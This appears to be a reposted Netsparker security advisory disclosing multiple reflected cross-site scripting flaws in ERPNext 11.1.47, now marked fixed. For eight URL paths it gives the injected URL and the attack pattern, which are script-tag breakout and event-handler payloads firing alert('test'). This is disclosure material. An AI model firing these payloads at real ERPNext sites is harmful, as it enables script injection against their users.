ERPNext 11.1.47 Cross Site Scripting

2020.01.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Information -------------------- Advisory by Netsparker Name: Multiple Reflected Cross-site Scripting Vulnerabilities in ERPNext Affected Software: ERPNext Affected Versions: 11.1.47 Vendor Homepage: https://erpnext.com/ Vulnerability Type: Reflected Cross-site Scripting Severity: High Status: Fixed CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N Netsparker Advisory Reference: NS-19-017 Technical Details -------------------- URL: http:// {DOMAIN}/address/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt> Parameter Type : Full URL Parameter Name : URI-BASED Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt> URL: http:// {DOMAIN}/addresses/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt> Parameter Type : Full URL Parameter Name : URI-BASED Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt> URL: http://{DOMAIN}/blog/"onload="alert(‘test’)" x Parameter Type : Full URL Parameter Name : URI-BASED Attack Pattern : "alert(‘test’)" x URL: http:// {DOMAIN}/contact/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt> Parameter Type : Full URL Parameter Name : URI-BASED Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt> URL: http:// {DOMAIN}/project/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt> Parameter Type : Full URL Parameter Name : URI-BASED Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt> URL: http://{DOMAIN}/user/admin@example.comx "%20onmouseover=alert(‘test’)%20x=" Parameter Type : Full URL Parameter Name : URI-BASED Attack Pattern : x"%20onmouseover=alert(‘test’)%20x=" URL: http://{DOMAIN}/api/method/x"%20onmouseover=alert(‘test’)%20x=" Parameter Type : Full URL Parameter Name : URI-BASED Attack Pattern : x"%20onmouseover=alert(‘test’)%20x=" URL: http://{DOMAIN}/api/x"%20onmouseover=alert(‘test’)%20x=" Parameter Type : Full URL Parameter Name : URI-BASED Attack Pattern : x"%20onmouseover=alert(‘test’)%20x=" For more information: https://www.netsparker.com/web-applications-advisories/ns-19-017-cross-site-scripting-in-erpnext/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top